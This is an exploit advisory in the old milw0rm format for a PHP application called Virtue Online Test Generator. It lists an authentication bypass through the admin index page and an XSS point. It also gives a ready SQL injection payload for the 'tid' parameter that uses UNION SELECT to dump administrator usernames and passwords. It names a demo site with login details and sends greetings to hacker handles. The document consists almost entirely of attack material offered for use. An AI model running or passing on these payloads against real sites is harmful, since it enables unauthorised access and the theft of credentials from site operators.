+===================================================================================+ | | | Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities | | | +===================================================================================+ | | | Author.: HxH | | Contact: HxH[at]live[dot]at | | | +===================================================================================+ | | | Script.: Virtue Online Test Generator | | Home...: http://www.virtuenetz.com/virtue_test_generator.php | | | +-----------------------------------------------------------------------------------+ | | | Exploit: After user login | | | | [+] Auth Bypass | | | | http://[website]/[script]/admin/index.php | | | | [+] SQLi | | | | http://[website]/[script]/text.php?tid=[SQL] | | | | [SQL]=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin-- | | | | [+] XSS | | | | http://[website]/[script]/text.php?tid= | | | +-----------------------------------------------------------------------------------+ | | | Demo...: http://www.virtuenetz.com/exam | | Usrinfo: E-mail:demo@virtuenetz.com ~ Pass:demo | | | +===================================================================================+ | | | Greetz.: ~ Jiko ~ Sniper Code ~ T3rr0rist | | | +===================================================================================+ # milw0rm.com [2009-06-26]